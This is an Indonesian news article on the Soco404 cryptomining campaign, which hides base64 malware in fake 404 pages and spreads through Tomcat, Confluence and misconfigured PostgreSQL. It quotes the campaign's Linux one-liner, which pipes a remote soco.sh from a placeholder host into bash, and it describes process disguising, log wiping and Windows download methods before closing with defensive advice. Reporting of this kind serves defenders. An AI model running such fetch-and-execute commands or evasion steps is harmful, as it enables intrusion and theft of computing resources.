Peneliti keamanan siber mengungkap kampanye penambangan kripto ilegal terbaru bernama Soco404, yang memanfaatkan halaman error 404 sebagai saluran penyebaran malware secara diam-diam. Serangan ini menyasar sistem operasi Linux dan Windows melalui situs Google Sites dan server Tomcat yang telah disusupi.

Malware disamarkan dalam bentuk kode base64 yang tersembunyi di antara tag HTML biasa dalam halaman error palsu. Karena tampilannya menyerupai halaman error standar, banyak alat pemindai URL atau antivirus tradisional gagal mendeteksi ancaman ini sejak awal. Dampaknya baru terasa setelah terjadi lonjakan pemakaian CPU dan menurunnya performa sistem.

Peneliti dari Wiz.io melaporkan bahwa kampanye ini mulai aktif pada pertengahan 2025 dan merupakan evolusi dari bot penambang sebelumnya yang mengeksploitasi kredensial Tomcat lemah serta celah keamanan di Atlassian Confluence.

Baca Juga: Gunra Ransomware: Ancaman Baru dari Kode Sumber Conti, Serang Endpoint Windows Secara Massif

Soco404 menyebar melalui berbagai jalur, termasuk database PostgreSQL yang salah konfigurasi. Melalui fitur COPY FROM PROGRAM, penyerang dapat menjalankan perintah sewenang-wenang di dalam server, lalu menyebarkan penambang secara lateral ke sistem lain.

Pada sistem Linux, malware diunduh melalui perintah satu baris berikut:

sh -c "(curl http://<alamat>:8080/soco.sh || wget -q -O- http://<alamat>:8080/soco.sh) | bash"

Skrip ini akan:

• Membunuh proses penambang kripto lain,
• Menghapus jejak di /var/log/wtmp,
• Mengaktifkan hugepages,
• Melakukan tuning CPU berbasis arsitektur Intel atau Ryzen.

Selanjutnya, malware menyamar sebagai proses sistem seperti cpuhp/1, sd-pam, atau kworker/R-rcu_p, lalu menjalankan penambang XMRig untuk menambang kripto Monero ke dompet tertentu.

Pada sistem Windows, teknik serupa dilakukan menggunakan certutil, Invoke-WebRequest, atau curl. File ok.exe ditanam ke direktori publik, dieksekusi melalui proses conhost.exe, lalu file aslinya dihapus secara otomatis. Aktivitas ini disembunyikan dengan baik, bahkan log sistem Windows pun dimatikan.

Perusahaan yang menjadi korban jarang menyadari infeksi secara langsung. Tanda-tanda awal biasanya hanya terlihat dari:

• Tagihan listrik yang meningkat,
• Penurunan kinerja perangkat secara bertahap,
• Tidak adanya log aktivitas mencurigakan di dasbor pemantauan.

Lebih lanjut, malware Soco404 membangun komunikasi lokal melalui soket, menjaga kelangsungan proses dan dapat hidup kembali jika dihentikan oleh administrator.

Untuk mencegah serangan serupa, langkah-langkah berikut disarankan:

• Tutup akses publik ke layanan seperti PostgreSQL jika tidak diperlukan,
• Perkuat kredensial dan perbarui patch keamanan secara rutin,
• Pantau anomali penggunaan CPU secara proaktif,
• Gunakan EDR yang dapat mendeteksi aktivitas fileless dan penggunaan soket lokal abnormal.

Soco404 menunjukkan bagaimana teknik sederhana seperti menyisipkan malware ke halaman 404—dapat menjadi alat canggih untuk mencuri sumber daya komputasi secara diam-diam. Serangan ini menjadi pengingat bagi organisasi untuk meningkatkan pemantauan dan proteksi terhadap sistem, bahkan pada komponen yang selama ini dianggap tidak berisiko.